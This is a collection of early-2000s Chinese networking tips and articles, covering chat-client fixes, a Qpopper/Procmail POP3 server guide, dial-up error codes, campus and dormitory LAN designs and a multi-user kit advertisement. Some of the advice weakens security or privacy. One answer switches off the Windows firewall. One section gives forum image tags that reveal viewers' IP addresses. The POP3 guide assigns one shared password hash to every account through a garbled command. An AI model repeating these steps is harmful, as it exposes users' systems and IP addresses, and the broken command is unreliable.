    问：闲来无事，将那个运行了两年的Windows 2000的操作系统换成了Windows XP SP2升级版，程序安装、上网一切正常，可昨天当要通过QQ发MP3歌曲给朋友时，发现总是传不过去，而且也不能接收。请问这是怎么回事？

    答：这是由于Windows XP中的拨号程序默认带了一个防火墙，导致了网络传输受阻。你可以通过关闭“Internet连接防火墙”功能，实现文件传输，操作步骤如下：打开“网络连接”，右键单击“拨号连接”后选择“属性”命令；在打开的拨号连接属性界面中选择“高级”标签，在“Windows防火墙”栏中单击“设置”按钮；在弹出的“Windows防火墙”面板中，选中“关闭(不推荐)”复选框，并单击“确定”退出即可。

    问：和平时一样，打开电脑、联网、登录MSN，当我苦苦等待MSN登录成功后的提示音，却弹出了“0x81000370错误”，卸载、安装了多次，结果还是一样。请问这是为什么？

    答：首先，打开IE属性，选择“连接→局域网设置”，在弹出的“局域网(LAN)设置”对话框中去掉“自动检测设置”；如果使用了代理服务器也可能导致MSN不能登录，操作方法如下：单击MSN面板中的“工具→选项”，确定“连接”选项卡上的“我使用代理服务器”复选框被清除。


设置“显别人的IP”

《一键清理系统垃圾》

设置“显别人的IP”

{img}http://dqdj.51.net/ip/3.php{/img}
{}换成[]

除了上面这个，再给你一个网址：
http://www.danasoft.com/sig-chi.jpg


如何设置一个高容量的Linux POP3服务器

《一键清理系统垃圾》

如何设置一个高容量的Linux POP3服务器

一: 概述
本文旨在介绍如何使用开放源软件Procmail和Qpopper来配置一台可供大量用户使用的POP3服务器,重点在于如何保持最佳的服务器性能。
二: 步骤
软件环境为RedHat Linux 7.1
1. 下载最新版的Procmail和Qpopper
Procmail 最新版本现在是3.21 可从
http://www.procmail.org/procmail-3.21.tar.gz下载。
Qpopper 最新版本现在是4.0 可从
http://www.eudora.com/qpopper_general/下载
2. 编译Qpopper
假设下载的文件放在/root
#cd /root
#tar xvfz qpopper4.0.3.tar.gz
#cd qpopper4.0.3
#./configure --enable-hash-spool=2
--enable-log-login
--enable-server-mode
--enable-fast-update
--enable-shy
--enable-spool-dir=/usr/mail
--enable-specialauth
注释：
--enable-specialauth 使用/etc/shadow 密码认证
--enable-hash-spool=2 使用二级hash结构
--enable-spool-dir=/usr/mail 则用户信箱文件为/usr/mail/j/e/jephe
--enable-log-login 记录下成功的POP3登录进入syslog
--enable-server-mode 和 --enable-fast-update
不要让qpopper在用户存取信箱时拷贝信箱文件到临时文件
减少磁盘I/O，增强性能
--enable-shy 让服务器响应时不要显示版本信息，增强安全性
#make
#make install
编辑文件/etc/inetd.conf
在/etc/xinetd.d下创建文件pop3,包含下面的内容：
service pop3
{
socket_type = stream
protocol = tcp
wait = no
user = root
server = /usr/local/lib/popper
server_args = qpopper -F -S -s -c -R -T120
port = 110
}
注释：
-F enable fast update
-S enable server mode (在用户对该服务器没有shell存取时做)
-s 打开LOG功能
-c 忽略用户名的大小写
-R 不对连接进来的IP地址做反向域名检查
-T 设定超时时间
这样设定之后，如果用户jephe收取信件时，则先锁定信箱文件/usr/mail/j/e/jephe创建锁文件.jephe.pop,检查信件数目，退时出更新状态，生成.jephe.cache文件。
否则正常模式下是先把/usr/mail/j/e/jephe拷贝成.jephe.pop，最后用户检查信箱完毕再拷贝回来，增加了I/O处理时间
如果不是redhat 7.1则在/etc/inetd.conf中注释以pop-3开头的行，然后在后面再添加下面的行： pop-3 stream tcp nowait.400 root /usr/local/sbin/popper -F -S -s -c -R -T120
nowait:400中的400是指每分钟最多可接受的连接请求数目
如果你在/etc/hosts.deny中设置了ALL:ALL,则要在/etc/hosts.allow中输入
popper:ALL
3. 编译Procmail
假设下载的文件放在/root
#cd /root
#tar xvfz procmail-3.21.tar.gz
#cd procmail-3.21
#vi src/authenticate.c
改#define MAILSPOOLDIR行后面的/var/spool/mail为 "/usr/mail/" (这里我用的是
/usr/mail)
改#define MAILSPOOLHASH 后面的0 为 2 (用二级hash目录，改进服务器文件系统性能，特别是有大量用户时)
注：这样的话，如果用户的信箱为jephe@domain.com，则文件应存在
/usr/mail/j/e/jephe
#mv /var/spool/mail /var/spool/mail.bak
注：先换名这个目录，因为可能当编译时如果能找到该目录，则优先用该目录及hash层次结构，这样的话将存储用户邮件到文件/var/spool/mail/j/e/jephe.如果你就想用这个目录，就不用改上面的MAILSPOOLDIR行。
#make
#make install
#make install-suid
然后以root身份运行#procmail -v检查用户的邮件路径确认为/usr/mail/r/o/root。
4. 创建POP3用户
你不需要为mail用户分配home目录，也不需要设置其主目录为/usr/mail/j/e (假定用户为jephe),用下面的命令创建用户。
#useradd jephe -c "Jephe Wu" -g mail -d /dev/null -s /bin/false
再可以写一个批命令用chpasswd给每个用户以同样的password.
a. 首先用passwd为mailuser1设置密码，假定为"abc123",检查/etc/shadow中的密
码，我的机器上"abc123"
为 $1$G22Plicn$r5.bSe0U7DbaHN7tCevTR/
b. 创建一个新文件/tmp/password,每行包括一个用户名:密码 ，可从/etc/passwd用下面的命令取得
cat /etc/passwd | awk -F: {print $1} |sed -e
s/$/:$$1$G22Plicn$r5.bSe0U7DbaHN7tCevTR//g
c. 然后运行chpasswd < /tmp/password
5. FAQ
a. 编译qpopper后，仍需在命令行上使用-F -S参数以启动服务器模式和快速更新，请放-F在-S的前面

返回


三种宽带上网拨号软件的常见故障与解决方法

《一键清理系统垃圾》

三种宽带上网拨号软件的常见故障与解决方法

    一、Windows XP自带拨号软件出错信息

     1.Error 691

     输入的用户名和密码不对，无法建立连接。

     原因：用户名和密码错误；ISP服务器故障。

     解决方法：使用正确的用户名和密码，并且使用正确的网络服务提供商提供的账号格式。

     2.Error 797

     ADSL Modem连接设备没有找到。

     原因：ADSL Modem电源没有打开；网卡和ADSL Modem之间的连接线或网线出现问题；软件安装以后相应的协议没有正确绑定；在创建拨号连接时建立了错误的空连接。

     解决方法：检查电源、连接线；检查网络属性，与PPPoE相关的协议是否正确安装并正确绑定；检查拨号连接的属性，看看是否使用了一个“ISDN　channnel - Adapter Namexx　”设备，该设备为一个空设备，应该选择正确的PPPoE设备代替它，或者重新创建拨号连接。

     二、RasPPPoE拨号软件出错信息

     1.Error 645

     网卡没有正确响应。

     原因：网卡故障，或者网卡驱动程序故障。

     解决方法：检查网卡，重新安装网卡驱动程序。

     2.Error 678

     与ISP服务器不能连接。

     原因：ADSL网络服务提供商的服务器故障，或者ADSL电话线故障。

     解决方法：检查ADSL信号灯是否能正确同步。

     3.Error 691

     输入的用户名和密码不对，无法建立连接。

     原因：用户名和密码错误，网络服务提供商的服务器故障。

     解决方法：使用正确的用户名和密码，并且使用正确的ISP账号格式。

     4.Error 791

     ADSL Modem连接设备没有找到。

     原因：ADSL Modem电源没有打开，网卡和ADSL Modem的连接线或LAN的网线出现问题，软件安装以后相应的协议没有正确绑定，在创建拨号连接时建立了错误的空连接。

     解决方法：检查电源、连接线；检查网络属性，与PPPoE相关的协议是否正确安装并正确绑定；检查拨号连接的属性，看看是否使用了一个“ISDN　channnel - Adapter Namexx　”设备，该设备为一个空设备，应该选择正确的PPPoE设备代替它，或者重新创建拨号连接。

     5.Error 602、Error 633

     拨号网络由于设备安装错误或正在使用，不能进行连接。

     原因：RasPPPoE没有完全或正确安装。

     解决方法：卸载所有PPPoE软件、协议，重新安装。

     三、Enternet 500拨号软件出错信息

     1.E0040P

     原因：ADSL Modem电源没有打开；网卡和ADSL Modem之间的连接线或网线出现问题；软件安装以后相应的协议没有正确绑定；在创建拨号连接时建立了错误的空连接。

     解决方法：检查电源、连接线；检查网络属性，与PPPoE相关的协议是否正确安装并正确绑定；检查拨号连接的属性，看看是否使用了一个“ISDN　channnel - Adapter Namexx　”设备，该设备为一个空设备，应该选择正确的PPPoE设备代替它，或者重新创建拨号连接。

     2.E0037P

     输入的用户名和密码不对，无法建立连接。

     原因：用户名和密码错误；网络服务提供商的服务器故障。

     解决方法：使用正确的用户名和密码，并且使用网络服务商提供的账号格式。


上海市石化工业学校千兆校园网全面解决方案

《一键清理系统垃圾》

上海市石化工业学校千兆校园网全面解决方案

    上海市石化工业学校是一所国家重点职业教育学校，在校园网建设中采取分期建设。首先建立校园网的主干，然后建立各个应用子系统，最后通过路由器与CERNET和Internet相连。
    上海市石化工业学校校园网第一期工程主要完成网络中心建设和校园网主干网络建设，重点建立学校信息管理网络、教学网络、图书管理网络和电子阅览室网络，并进行教学楼、办公楼、图书馆的结构化布线。第二期工程要将网络扩展到整个校园，实现校园网的全部功能。

    校园网建设要求

    * 网络具有传递语音、图形、图像等多种信息媒体功能，具备性能优越的资源共享功能；

    * 校园网各终端间具有快速交换功能；

    * 中心系统交换机采用虚拟网技术，对网络用户具有分类控制功能;

    * 对网络资源的访问提供完善的权限控制;

    * 网络具有防止及便于捕杀病毒功能，以保证网络使用安全;

    * 校园网与Internet网相连后具有“防火墙”过滤功能，以防止网络黑客入侵网络系统;

    * 可对接入因特网的各网络用户进行权限控制。

     校园网硬件设计

    一、校园网主干网络

    1.主干类型选择

    网络主干由主干交换机、分布在各建筑中的主干节点、连接光纤组成。

    近两年，千兆位以太网（Gigabit Ethernet）交换技术得到飞速发展，与ATM相比，千兆以太网的突出优势是价格低廉、可以与快速以太网和以太网完全兼容、可以为校园网提供足够的带宽，并且它具有以太网的所有优点，是建造校园网的理想选择。

    在本方案中采用基于第三层交换的千兆以太网作为校园网主干。

    2.主干交换机选择

    在本方案中，主干交换机采用Lucent公司Cajun P550交换机，它属于第三层千兆以太网路由交换机，内部集成路由功能，具备高容量、无阻塞、优质的管理能力和可靠的多媒体支持等特点。将千兆以太网交换、快速以太网交换、以太网交换以及路由都集成到一个交换机中，使得交换机的功能十分强大。

    节点交换机和主干交换机之间通过千兆光纤连接。

    3.节点交换机选择

    北区、南区办公楼各用一台Cajun P330交换机作节点交换机，北区、南区教学楼各用一台Cajun P120交换机作节点交换机，组成快速以太工作组网。

    4.干线光纤

    在校园网中，此次需铺设四条主干光缆（北区图书馆—北区办公楼、北区图书馆、南区办公楼、南区图书馆、北区教学楼、南区办公楼—南区教学楼），采用的是多芯室外铠装多模光缆。

    5.广域网互联和网络安全

    广域互联也是本设计的重点，本方案中使用PortMaster2R，通过一条DDN专线，将校园网接入中国教育科研网CERNET， 从而进入国际互联网Internet。

    为保证网络安全、防止黑客非法侵入网络，网络必须提供IP防火墙。PortMaster2R内置防火墙，可有效地保证网络的安全。

    二、应用子网及网络互连

    上海市石化工业学校校园网除网络主干外，还应有教育管理子网、图书馆管理子网、电子阅览室子网、计算中心子网等子网。

    对于已有的子网,只需要通过节点交换机的10M/100M以太网接口,与该子网的集线器或交换机相级联即可。

    三、网络管理

    由于方案采用的全部是智能网络设备（交换机、路由器等），它们可以收集信息，并通过网络管理协议传送给管理设备。本设计方案采用Lucent基于Windows NT平台的Cajun View软件，通过网络管理工作站对整个网络的智能设备进行有效的图形管理。

    四、网络服务器

    网络服务器包括文件服务器、Internet服务器、网管工作站、以及面向全校使用的小型机等。

    服务器的档次建议选PⅡ400以上、Toshiba Magnia系列服务器。

    五、系统软件

    网络平台：Windows NT Server 4.0中文版，工作站端用Pwin98；

    数据库开发平台：Microsoft SQL Server 7.0；

    邮件通讯软件：Microsoft Exchange Server 5.5；

    办公自动化软件：Microsoft Office 97/2000；

    多媒体教学及课件制作软件：PowerPoint、Autherware；

    浏览器、电子邮件及主页制作软件；

    网络计费软件。

    六、结构化综合布线

    根据综合布线的原则，对上海市石化工业学校的北区办公楼、教学楼、图书馆和南区办公楼、教学楼进行结构化综合布线。依据结构化布线原则，本着达到布局美观的效果，楼宇间的布线采用光纤，各楼层的布线走PVC管或在天花板内走线，并在结构化布线系统中的信息插座，留有一定的冗余度，以确保日后终端设备位置调整和网络扩展的需要。

    本方案中，我们采用Lucent Technologies 的Systimax SCS综合布线产品。

    校园网应用

    一、校园网管理信息系统

    中国职业教育校园网集成系统CVES面向全校，分为教学管理、学生管理、行政管理、通用服务、互联网络、IC卡管理和图书馆管理等七个分系统，以及教务管理、教师管理、教材管理、设备管理、学籍管理、考绩管理、人事管理、文书管理、综合查询、通用查询、电子邮件、远程登录、校园卡管理、校园卡伙食管理、校园卡学生查询、图书编目、图书流通、图书检索和馆长查询等近七十个管理子系统。

    CVES集管理、教学和科研为一体，是中等专业学校信息化的全面解决方案。通过IC卡的运用，实现了学生证、出入证、阅览证、借书证、就餐卡、医疗卡、上机卡、储蓄卡等多证多卡合一的功能。

    CVES软件采用了新的开发平台（VC++）和数据库平台（SQL Server），软件设计采用了C/S和B/S结构。系统运行平台为中文Windows，软件风格统一，可视化图形界面，丰富的联机帮助，操作简便，使操作人员轻松上手。

    二、校园网计算机教学系统

    计算机教学系统主要包括多媒体网络教室、多媒体视频点播、多媒体视频广播系统，该方案首先实现了多媒体网络教学功能。

    本方案采用华育公司自有产品：华育多媒体网络教室。该产品采用纯软件构架，实现了屏幕及语音广播、屏幕监视、遥控辅导、教学示范、师生对讲、分组讨论、电子论坛、消息发送、电子抢答、电子举手、远程命令、本地命令、文件传送、网络影院、远程复位、远程关机、电子教鞭、电子黑屏、远程管理等功能，完全实现了现代化教学。

    三、校园网站

    校园网不是一个独立的、封闭的体系，校园网与Internet互连后，校园网用户在权限允许的范围内可以使用Internet上的Web访问、Email收发、FTP、Telnet、BBS、新闻组、讨论组、个人主页等服务。

    校园网站连接Internet，用于宣传学校形象、教学信息发布、提供信息查询等，以后可成为网上教学的渠道。网站主页的设计，主要由老师创意，学生制作，体现学生的创造性，培养学生的动手能力。

    本方案由中国华育发展总公司信息工程事业部负责设计与实施，2000年3月开始，7月31日宣告完成。它的特点是：先进性、可扩展性、开放性、安全性、可管理性、应用丰富。在整个设计与实施过程中，中国华育在充分考虑了上海市石化工业学校的既有设备与资金等实际情况的基础上，整体规划、分步实施，保证学校投资，具有较高的科学性与参考价值。

    上海石化工业学校校园网拓扑图

返回


设计一个廉价实用校园网

《一键清理系统垃圾》

设计一个廉价实用校园网

    最近，美国总统克林顿宣布了一项庞大的计划，就是用最快的速度将美国的所有中小学校连接因特网，以保证这些学生可以应付未来信息社会的挑战。对于财大气粗的美国来说，实施这个计划并不困难。而我们国家由于经济不太发达，没有那么多的资金来建设中小学的校园网，但是又不能让我们的孩子输在起跑线上。因此，钱少有钱少的做法，如果精心设计，也可以构筑一个性能并不逊色的校园网。
    小型校园网络从本质上说与企业网并无区别, 之所以称为小型校园网, 一是其主要适用于广大的规模和校园面积较小的各类中等级学校或者小学; 二是小型校园网除具有一般网络的资源共享、通信等功能之外，还可以根据实际需求建立教学业务系统(如教学管理系统、试题库系统、电子备课系统、专业教学模拟系统等)，与Internet连接。

    选型与硬件配置

    小型校园网的硬件一般限于PC工作组级的设备，不考虑企业级服务器、路由器的设备。
    局域网的类型有多种，但性价比占优的仍是以太网。以太网最主要的优点是组网的设备简单、廉价。以太网采用CDMA/CD机制，随着网上传输量的增加，会出现广播拥塞，引起传输效率大幅度下降，因此组网规模不能太大。不过，如果规划得当，几百台微机还是不成问题的。
    以太网的拓扑结构主要是星型(IEEE的10BASE－T标准)和总线型(10BASE2标准)。星型采用集线器(Hub)作为交换设备，用无屏蔽双绞线(UTP)连接网络上各台计算机；而总线型多采用同轴细缆两端加75欧姆终结器，网上每台计算机都与总线相接。两种拓扑结构提供的最高带宽都是10Mbps，由所有入网的计算机共享。为了能提高带宽，可以采取将网络分段，再用网桥连接的办法，降低每个网段上的计算机数目。如最简单的办法就是在服务器上多插几块网卡，用服务器同时充当网桥。一般都认为总线型的拓扑结构布线、扩充容易，布线距离长(两节点之间的最长距离可达185m，相比之下UTP只有100m)，抗干扰性好，缺点是可靠性差。主要是一旦总线中断，总线上所有的计算机皆瘫。但实践经验证明，若选用质量好的焊接式BNC接头，可靠性并不逊色。可用于连接一些布线距离长的桌面设备。
    100BASE－T采用交换技术和快速交换技术提供最高为10M和100M的带宽取代以太网的共享10M带宽，使用以太网交换机替代传统的Hub，网络服务器、工作站使用PCI总线的10/100M自适应以太网卡替代ISA或PCI 10M网卡，使用五类UTP替代三类UTP。由于网卡、UTP的价格差价已不很大，主要增加的费用就体现在交换机上。用户可根据实际需求选择不同的交换技术和相应的交换机(Switch)、交换式集线器(Switch Hub)产品。
    小型校园网的主干线路有条件的话可以采用多模光纤，也可以用五类UTP，但在室外应加金属护套（如钢管）后埋设或架空。UTP与电力导线平行敷设时，间距应大于0.5m。网络布线应遵循IEEE 100BASE－T连接规范。比如五类UTP与RJ－45接头衔接应按1－2、3－6配对，保证1－2、3－6是分别成对缠绕成双绞，避免因串扰而影响其它电缆的数据快速传输。
    作为主干交换机的位置，应尽量选在局域网范围的几何中心，确保到各终端点或分组交换设备的距离不超过100m。若从交换设备到终端的网段超过100m ,可以采取几种方法延长距离：使用超五类UTP(可以达130～150m )；使用集线器或集线式交换机级联(但最多中间也只能级联一个)；选用安装远距离扩展硬件模块的交换产品，可延长100m。
    在有条件的情况下，应考虑网络日后的发展和有针对性地选用交换产品：
    如要扩充网络，应考虑选择有堆叠功能的交换机、集线式交换机。所谓堆叠，讲的简单些就是将多个产品按照某种连接方式(如菊花链也就是级联、交叉阵列、全网状等)连接，从而扩大工作组连接的终端数目。要注意不同的连接方式决定不同的带宽。目前大多产品都是级联堆叠，堆叠的设备之间连线长度有限制，一般都很短，除非安装远距离扩展模块。级联方式的弱点主要是带宽降低，但成本较低。
    如要升级网络，应考虑选择有支持光纤端口、支持ATM、千兆位以太网的交换设备。可以预见，千兆位以太网将成为未来的校园网骨干网的首选。
    快速以太网大大提高了网络的性能，尤其是可以适应Web浏览、客户机/服务器(C/S)计算、图形用户界面(GUI)的需要。据有的实验表明，在100M的环境下，工作站从服务器启动应用程序或从服务器复制大批数据文件，其速度都要比从本地硬盘启动或从本地硬盘复制要快。但是快速以太网对于交互式实时传输声音影象多媒体数据仍然不能达到令人满意的效果。

    网络系统平台

    PC机硬件平台上工作组级的网络操作系统(NOS)的主要选择是Novell的NetWare和Microsofe的Windows NT。本文主要指NetWare 4.X以上和 NT 4.0版本。
    NetWare 是一个纯服务器系统平台产品，没有客户机端的系统平台。但NetWare支持DOS 和 Windows系列的客户机，包括Windows、Windows For Workgroups(这是早期的工作站产品，没有中文版)、Windows 9X、Windows NT等等。当然也可以说Windows系列支持NetWare；而Windows NT 包含服务器产品Windows NT Server 和工作站端产品Windows NT Workstation。NT server 自然支持Windows 系列的客户端产品(这里考虑到大多数客户机用户都是使用DOS 和Windows系列的产品，不再列举其它客户机操作系统，不过Windows 3.x本身不具备联网的功能，需要专用软件支持)。
    从较小规模、较低层次的应用来看，两者提供的功能如支持TCP/IP协议、提供域名服务(DNS)、动态主机配置协议(DHCP)和Web浏览、文件管理和打印服务、网关服务、网络管理等等，并无太大的差别。关于两者的功能有关报章介绍的很多，本文不想赘述，只是从使用的角度比较一些两者系统本身的差别。
    NetWare采用Novell 目录服务(NDS，NetWare 4.x 之后的版本才有)。NetWare网络起始于一台服务器，相当于种下一棵NDS树。NDS的结构类似于硬盘的树型目录结构，以后的服务器都可以加入这棵树。但是，由于NetWare 是一个服务器产品，所有的资源都是基于安装了NetWare的服务器的，即使是工作站需要共享的资源也是从服务器得到的，所以网络无法直接实现工作站之间点到点的访问。虽然这样从管理和安全的角度来说也许更好，但在工作组的环境中毕竟不够方便，也给C/S应用增加了难度。
    NT Server采用一种“域”的管理结构。在一个域中有一个主域控制服务器(PDS)，加入域的可以是服务器、工作站或打印机，PDS负责管理域中的计算机、用户帐户数据库等等。域的管理工作(如计算机归属的域、域用户的环境配置等)是需要逐台在域中每台机器上进行的，没有那么灵活方便，特别是网络规模较大的情况下。
    我们可以充分利用两种NOS的长处，构筑一个NetWare和NT的混合环境。利用NetWare的文件服务和网络NDS，发挥NT 应用服务的特点。为了把NT 域纳入NDS，Novell新推出一种软件NDS for NT 4.0，但尚无中文版，无法预测对中文平台的效果。

    网络的应用

    有了NOS，仅仅是一个裸网，更重要的还是网络的应用。
    网络的一个重要的功能就是运行管理信息系统(MIS)。对于MIS 的建设，传统的做法无非是购买商品软件和自行开发两种主要途径。购买商品软件的好处是见效快、费用省，软件质量可能高一些。但主要缺点是难以适应各个学校在管理和教学上的实际需求。目前国内开发中小等级学校的管理软件的厂商很少，使用户难以有更多的选择。自行开发的好处是能够不断适应学校在管理上的要求，但开发周期长，依赖少数开发人员，而且有些不具备技术力量的学校也难以做到。这实际上是校园网建设的主要难题。但关键的是，不管如何，单一的、功能固定的MIS软件很难涵盖管理和实际应用的不断变化的需求，也不是校园网建设的最终目标。
    群件(GroupWare)，意思是帮助群组协同工作的软件。群件主要包括电子邮件、文档管理与工作流应用几大部分。群件的产品主要有Lotus 的Domino/Notes、Microsoft的Exchange 和Novell 的GroupWise。Lotus、Microsoft的群件都有服务器版和客户机版，Exchange Server 捆绑在Microsoft BackOffice 之中随NT Server 发行。
    目前，有一些大中学校都已经开始使用用群件开发的校园网软件，而且用户也可以根据自身的需求进行二次开发。使校园网的应用走商品软件与自行开发相结合的道路。
    另外，对于普通或专业学校，校园网的一个重要作用就是运行教学模拟系统。模拟的内容可以是多方面的，如网上Web浏览、电子商务、财务管理信息等。现代的各种信息已与Internet难以分开，但是上网仍然是一个不小的经济负担。为此，可以利用校园网虚拟一个Internet网络环境，建立一两个Web浏览服务器，与实验室教学网络相接，提供图书、试题库、光盘资料库浏览服务，甚至可以利用校内小型电话交换总机“远程拨号上网”。国内有高校在近年来已经研制了贸易模拟教学软件，希望今后将有更多的网上教学软件问世。
    总之，校园网这一新生事物，随着人们对它认识的逐步加深，将在教育领域发挥出越来越重要的作用。

返回


宿舍网组建全攻略

《一键清理系统垃圾》

宿舍网组建全攻略

    随着电脑的价格的不断下降，学生一族中买电脑的人一天比天多。同一个宿舍和相邻宿舍都有不少的机子，怎样利用现有的条件，使电脑更好地为我们服务呢？答案就是：把这些电脑连接起来，构成一个局域网。
    我们是利用WINDOWS95或WINDOWS98来组网的。这样的好处是可以大大节省开支，因 为利用WINDOWS95或WINDOWS98来组网，就可以省去买服务器的钱了。这对于我们学生一族来说，可是个不错的方案哦。下面就给大家讲述经济实用的宿舍网组建方案：

    一、准备篇:

    所需硬件：
    1、计算机：这是当然是必不可少的啦。
    2、网卡：选用与NOVELL NE2000兼容的符合Windows即插即用具有T型头的网卡。
    3、同轴电缆、T型头、终端若干：由于考虑到户外布线，所以我们选用同轴电缆
    4、一个56K Modem ：如果你连网后想要上Internet的话，就可以考虑买一个"猫"，内置、外置均可，如果网络有较多用户，最好选用外置的。

    所需软件：
    WINDOWS95或WINDOWS98及网卡驱动程序。

    二、安装篇：

    1．硬件的安装：
    将网卡插入计算机机的一个ISA或PCI插槽中，固定好，然后把T型头的底端接在网卡的接口上，两 端接在同轴电缆上，把所有的计算机串连起来。
    2.软件的安装及设置：
    (1).网卡驱动程序的安装和设置： 如果用的是即插即用的网卡，开机时系统会提示发现新设备，要求加载设备驱动程序，这时插入网卡自带的软盘，找到该网卡WINDOWS95或WINDOWS98下的驱动程序，然后安装即可，也可直接使用Windows95提供的设备驱动程序，选“厂商”下 “Novell/Anthem”中的“NE2000 Compatible”即可（建议采用网卡自带的驱动程序）。
    如果用的不是即插即用的网卡，可双击“我的电脑---->控制面板”下的“添加新硬件”，然后选择“搜索新硬件”，再按上述方法加载设备驱动程序，确认后重新启动计算机。 如果计算机提示网络适配器工作不正常或安装网卡后不能进入WINDOWS，则可能是网卡的中断或输入输出地址与其它设备有冲突，可以在“控制面板--->系统--->设备管理器--->网络适配器--->属性--->资源”中重新设置网卡的中断请求和输入输出范围。
    (2)网络的设置：
    1）.进入“控制面板---->网络”，按“添加”后双击“客户”，选“厂商”下“MICROSOFT”中的“网络客户\MICROSOFT用户”，然后按“确定”。

    2）.双击“协议”， 选“厂商”下“MICROSOFT”中的“网络协议--->TCP/IP”,然后按“确定”。

    3）.双击“服务”， 选“厂商”下“MICROSOFT”中的“网络服务--->MICROSOFT网络的文件和打印机共享”，按“确定”。

    4）.在“主网络登录”中选“MICROSOFT网络用户”。
    5）.把“文件和打印共享”中的两项都选上；

    6）.在“标识”中输入计算机名称和工作组名称，每台计算机应该有不同的名称。
    7）.最后按“确定”，这时系统会提示你放入Windows的安装盘，安装好相应的驱动程序后，重新启动系统。
    这样就把所有的计算机连接起来了，下面我们可以通过网络实现资源共享、共用一个Modem上Internet、连网玩游戏、看影碟。

    三、应用篇：

    1.实现资源共享：
    双击“我的电脑”，把你想共享的驱动器或文件夹用右键单击，单击“共享”后会弹出一个菜单，将“共享为”一项选中，在“共享名”一项中输入共享的名字，设置访问类型可以是“只读”（只能读不能写）、“完全”（可读、可写、可删）和“根据口令访问”（由口令决定访问权限），然后输入相应的口令，一般情况下设为“只读”即可。 当所有的计算机都设置好了以后，你就可以双击Windows桌面上的“网上邻居”，访问其它计算机上共享出来的资源了。

    如果你的计算机已经安装了打印机，只要打开“控制面板”中的“打印机”文件夹，用右键点击“打印机”，会弹出一个菜单，选“共享”这一项，选中“共享”，那么其他人就能使用它了。如果你要在网络上使用别人的打印机，可以在“我的电脑”中打开“打印机”这一项，双击“添加打印机”，在“如何与计算机相连”中选“网络打印机”，在“网络路径或队列名”一项选“浏览”，在“网上邻居”中找到打印机所在的计算机，打开那台计算机就能看到你所需要的打印机，选中你所需要的打印机然后按照提示即可完成安装。

    2.共用一个Modem上Internet：

    想要共用一个Modem上Internet，可以通过代理服务器软件或通过WINDOWS98第二版的INTERNET共享功能来实现。
    现在我们采用第二种方法：
    首先找一台已经安装好WINDOWS98第二版的计算机，安装Modem 作为服务器。然后开始进行INTERNET共享设置：打开“控制面板”中的“添加/删除程序”--->Windows 安装程序--->Internet工具，按"详细资料"后选择Internet连接共享,然后按“确定”。之后会出现Internet连接向导，按照向导设置好后，重新启动计算机。鼠标右键单击Windows桌面上的“网上邻居”，选择弹出菜单中的属性，选中"TCP/IP(Home)"后按"属性"钮。弹出"TCP/IP(Home)属性"窗口，如下图：

    请选中指定IP地址，IP地址设为192.168.0.1 子网掩码设为255.255.255.0。 然后在其他计算机上用鼠标右键单击Windows桌面上的“网上邻居”，选择弹出菜单中的属性，选中"TCP/IP"后按"属性"钮。弹出"TCP/IP属性"窗口，选中网关，输入新网关192.168.0.1（即"服务器的IP地址），之后按"添加"钮,重新启动计算机。

    在设置完之后，先用安装有WINDOWS98第二版和Modem 的计算机拨号上网，然后其他的计算机就可以打开浏览器一起上网了。

    3.连网玩游戏：
    连网了，不玩游戏可对不起网络。在安装好具有连网功能的游戏（如帝国时代、星际争霸）之后，进入游戏，进行有关设置：主要是输入所连网计算机的IP地址。设置好之后就可以开战了。

    4.连网看影碟：
    连网看影碟主要是通过安装有关软件来实现的，这里向大家介绍如何利用豪杰超级解霸2000DVB功能来实现连网看影碟。安装好豪杰超级解霸2000之后，打开超级解霸2000,选择"控制"--->"控制设置"，会弹出一个"其他设置"窗口，如下图：

    选中允许DVB广播之后，按"配置DVB广播"，弹出"是否进行DVB广播"窗口，

    选中进行DVB广播后，按"确定"按钮。然后中其他计算机上安装好豪杰超级解霸2000，之后打开超级解霸2000,选择"文件"--->"接收 DVB广播"。设置完之后，在进行DVB广播的计算机播放影碟时，其他连网的计算机就可以收看了。

    四.结束：

    好了，到这里宿舍网组建全攻略就讲完了。这个组网方案经济、实用，不但适合学位宿舍使用，也可应用于其他地方（如家庭、小公司、小单位等），网络的应用也还有许多，在这就不作介绍了。

返回


同时共享一台电脑的资源！如同单独使用一台多媒体电脑

《一键清理系统垃圾》

同时共享一台电脑的资源！如同单独使用一台多媒体电脑

一台电脑可以变成7个工作站

◇　　 每个工作站共享主机资源，同时享受多媒体的影音

◇　　 提供一个不用购买新电脑就可以拥有另一台电脑的经济方案

◇　　 MMU2000/XP-USB套件可以使你的电脑变成7个工作站

◇　　 自动优化网络资源，无需另行配置

MMU2000/XP-USB套件包含

◇　　 1只多媒体外接盒，可以连接麦克风、喇叭、PS2键盘和鼠标

◇　　 1条1.8米的USB连接线（可选购5米）
◇　　 一张驱动光盘、工具软件及说明书电子文档

◇　　 一组序号/授权码及授权合同书

除了2000/XP-USB套件，还需要

◇　　 PS2键盘、鼠标

◇　　 麦克风及喇叭

◇　　 一台标准的VGA/SVGA显示器（CRT或LCD）

◇　　 一块与本系统兼容的PCI显示卡

本系统工作原理

◇　　 每个使用者拥有独立的键盘、鼠标和多媒体设备

◇　　 共享主机的硬件资源

◇　　 每个工作站至少需要450M的运算速度和128M内存（视操作系统而定）

采用分时多工的核心技术，无延迟的工作环境

◇　　 每个使用者就好像同时使用主机系统的存储、周边设备、应用程序和操作系统

◇　　 每个使用者可在极端时间内存取系统资源，感觉不到没有任何延迟

◇　　 只需要一套操作系统及应用软件的使用授权

产品规格

◇　　 USB2.0，同时兼容USB1.1规格、符合FCC及CE认证

◇　　 支持最新的操作系统，不同于无盘系统只能工作于WIN98/95平台

◇　　 远端监视/控制/广播-适用于Windows98/ME/2000/XP也适用于单机多人系统

◇　　 方便系统管理员/讲师远端控制桌面电脑、笔记本电脑或单机多人电脑

mrCONROL Remote Control Software

系统特色

◇　　 mrCONROL针对单机多人系统的远端监视/控制/广播作了最优化设计，不会造成延迟

◇　　 mrCONROL使用TCP/IP协议，使系统更稳定可靠

◇　　 mrCONROL是市面上唯一可以用于单机多人的远程控制/管理软件

◇　　 本系统可以控制上百台电脑或单机多人系统

系统应用

◇　　 用于学校教育方面，提供学生或受训练的人员在线教学

◇　　 用于企业培训、配合电话培训或开会

◇　　 用于系统集成商远程支援服务

◇　　 用于监控企业的所有电脑

◇　　 系统功能

◇　　 远程监控

◇　　 可以监视在线的所有工作站

◇　　 多画面监控，最多16个窗口

◇　　 系统自动扫描在线的工作站

◇　　 系统管理员凭权限可以在网络中任何一台工作站上监控、远程控制

◇　　 远程控制

◇　　 管理员可以远程控制使用者的键盘、鼠标及屏幕

◇　　 管理员远程锁定工作站

